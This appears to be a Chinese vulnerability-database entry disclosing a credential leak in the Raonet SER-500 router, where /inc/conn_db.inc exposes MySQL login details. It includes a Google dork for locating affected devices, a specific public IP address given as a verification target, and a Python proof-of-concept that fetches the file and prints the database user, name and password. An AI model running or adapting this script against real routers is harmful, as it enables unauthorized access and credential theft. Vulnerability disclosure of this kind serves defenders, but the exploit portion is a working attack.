Raonet Subscriber Ethernet Router MySQL 数据库账户密码泄露

基本字段

漏洞编号:
SSV-89255
披露/发现时间:
未知
提交时间:
2015-08-28
漏洞等级:
漏洞类别:
越权访问
影响组件:
Raonet SER-500
(Raonet SER-500)
漏洞作者:
未知
提交者:
ulrdflel
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 ulrdflel 共获得  0.45KB

Raonet SER-500 路由器 MySQL 账户密码泄漏, 可远程登录, 高权限. 验证地址: http://61.77.63.86/inc/conn_db.inc Google dork: intitle:Raonet Subscriber Ethernet Router

Near wstart wonderkun jax777 共 6  兑换了

PoC (非 pocsuite 插件)

贡献者 ulrdflel 共获得   1.65KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python
import urlparse
import re
import urllib2
def assign(service, arg):
if service != "www":
return
arr = urlparse.urlparse(arg)
return True, '%s://%s/inc/conn_db.inc' % (arr.scheme, arr.netloc)
def getMiddleStr(content, r):
pattern = re.compile(r)
return pattern.search(content).groups()[0]
def audit(arg):
url = arg
response = urllib2.urlopen(url)
code = response.getcode()
res = response.read()
if code == 200:
print 'db_id: ' + getMiddleStr(res, '\$db_id = "(\w*)"\w*')
print 'db_name: ' + getMiddleStr(res, '\$db_name = "(\w*)"\w*')
print 'db_pass: ' + getMiddleStr(res, '\$db_pass = "(\w*)"\w*')
if __name__ == '__main__':
audit(assign('www', 'http://61.77.63.86/')[1])
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Near wstart wonderkun jax777 ak218 等 11 兑换

参考链接

解决方案

临时解决方案

禁止访问配置文件

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 2503
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负